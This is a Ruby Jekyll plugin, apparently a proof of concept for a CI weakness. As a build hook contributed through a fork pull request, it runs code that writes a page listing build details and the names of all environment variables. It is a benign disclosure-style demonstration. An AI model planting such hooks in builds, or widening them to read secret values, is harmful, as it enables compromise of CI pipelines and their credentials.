Jekyll::Hooks.register :site, :post_write do |site|
  marker_path = File.join(site.dest, "marker.html")
  File.write(marker_path, <<~HTML)
    <html>
    <body>
      <h1>POC: Jekyll Plugin Code Execution</h1>
      <p>this file was generated by a custom Jekyll plugin from a fork PR.</p>
      <p>build time: #{Time.now.utc}</p>
      <p>Ruby version: #{RUBY_VERSION}</p>
      <p>working directory: #{Dir.pwd}</p>
      <p>environment variables available (names only, no values):</p>
      <ul>
        #{ENV.keys.sort.map { |k| "<li>#{k}</li>" }.join("\n   ")}
      </ul>
    </body>
    </html>
  HTML
  Jekyll.logger.info "POC:", "marker file written to #{marker_path}"
end
